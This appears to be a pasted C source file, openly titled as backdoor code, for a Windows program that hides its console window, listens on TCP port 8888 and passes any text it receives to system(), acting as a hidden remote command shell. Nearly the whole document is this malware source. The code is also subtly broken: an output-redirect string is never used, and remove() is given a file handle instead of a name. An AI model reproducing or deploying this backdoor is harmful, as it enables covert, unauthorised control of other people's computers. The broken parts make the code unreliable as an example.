backdoor c code

1. /*
2. Create a TCP socket
3. */
4.  
5. #include<stdio.h>
6. #include<stdlib.h>
7. #include<string.h>
8. #include<winsock2.h>
9.  
10. #pragma comment(lib,"ws2_32.lib") //Winsock Library
11.  
12. int main(int argc, char *argv[])
13. {
14. HWND hWnd = GetConsoleWindow();
15. ShowWindow(hWnd, SW_MINIMIZE); //won't hide the window without SW_MINIMIZE
16. ShowWindow(hWnd, SW_HIDE);
17. backdoor();
18.  
19. return 0;
20. }
21.  
22. int backdoor()
23. {
24. WSADATA wsa;
25. SOCKET s, new_socket;
26. struct sockaddr_in server, client;
27. int c;
28. char *message, server_reply[100000];
29. int recv_size;
30.  
31. printf("\nInitialising Winsock...");
32. if (WSAStartup(MAKEWORD(2, 2), &wsa) != 0)
33. {
34. printf("Failed. Error Code : %d", WSAGetLastError());
35. return 1;
36. }
37.  
38. printf("Initialised.\n");
39.  
40. //Create a socket
41. if ((s = socket(AF_INET, SOCK_STREAM, 0)) == INVALID_SOCKET)
42. {
43. printf("Could not create socket : %d", WSAGetLastError());
44. }
45.  
46. printf("Socket created.\n");
47.  
48. //Prepare the sockaddr_in structure
49. server.sin_family = AF_INET;
50. server.sin_addr.s_addr = INADDR_ANY;
51. server.sin_port = htons(8888);
52.  
53. //Bind
54. if (bind(s, (struct sockaddr *)&server, sizeof(server)) == SOCKET_ERROR)
55. {
56. printf("Bind failed with error code : %d", WSAGetLastError());
57. exit(EXIT_FAILURE);
58. }
59.  
60. puts("Bind done");
61.  
62. //Listen to incoming connections
63. listen(s, 3);
64.  
65. //Accept and incoming connection
66. puts("Waiting for incoming connections...");
67.  
68. c = sizeof(struct sockaddr_in);
69. FILE *fp2;
70. char ch;
71. int i = 0;
72. int clean_array = 0;
73. char array[10000];
74. char concat[11] = " > cmd.txt";
75. char error_message[100] = "\n !!! WRONG COMMAND !!!" ;
76. char chdir_message[100] = "\n Chdir to : ";
77. char chdir_success[100] = "\n Chdir success !\n";
78. int ret;
79. int chdir_flag;
80.  
81. while ((new_socket = accept(s, (struct sockaddr *)&client, &c)) != INVALID_SOCKET)
82. {
83. puts("Connection accepted");
84.  
85. int a = 1;
86. while (a == 1)
87. {
88. if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
89. {
90. puts("recv failed");
91. }
92. else
93. {
94. printf("recv size : %d\n", recv_size);
95. server_reply[recv_size] = '\0';
96. printf("INPUT : %s\n", server_reply);
97.  
98. chdir_flag = strcmp(server_reply, "chdir");
99. printf(">>> %d <<<\n", chdir_flag);
100.  
101. if (chdir_flag == 0)
102. {
103.  
104. if (send(new_socket, chdir_message, strlen(chdir_message), 0) < 0)
105. {
106. puts("Send failed");
107. return 1;
108. }
109.  
110. if ((recv_size = recv(new_socket, server_reply, sizeof(server_reply) - 1, 0)) == SOCKET_ERROR)
111. {
112. puts("recv failed");
113. }
114. printf("CHDIR : %d\n", recv_size);
115. server_reply[recv_size] = '\0';
116. printf("INPUT : %s\n", server_reply);
117. chdir(server_reply);
118. printf("Chdir DONE !!!\n");
119.  
120. chdir_flag = 1;
121.  
122. if (send(new_socket, chdir_success, strlen(chdir_success), 0) < 0)
123. {
124. puts("Send failed");
125. return 1;
126. }
127.  
128.  
129. }
130. else
131. {
132.  
133. printf("Command output >>\n");
134. ret = system(server_reply);
135. printf("\n\n>>> %d <<<\n\n", ret);
136.  
137. i = 0;
138.  
139. if (ret == 0)
140. {
141. fp2 = fopen("cmd.txt", "r");
142. while ((ch = fgetc(fp2)) != EOF)
143. {
144. printf("%c", ch);
145. array[i] = ch;
146. i++;
147. }
148. array[i] = '\0';
149.  
150.  
151.  
152. remove(fp2);
153. fclose(fp2);
154.  
155. if (send(new_socket, array, strlen(array), 0) < 0)
156. {
157. puts("Send failed");
158. return 1;
159. }
160.  
161. for (i = 0; i < 10000; i++)
162. array[i] = '\0';
163.  
164. }
165. if (ret == 1)
166. send(new_socket, error_message, strlen(error_message), 0);
167. }
168. }
169. }
170.  
171.  
172. if (new_socket == INVALID_SOCKET)
173. {
174. printf("accept failed with error code : %d", WSAGetLastError());
175. return 1;
176. }
177.  
178. }
179. closesocket(s);
180. WSACleanup();
181.  
182. return 0;
183. }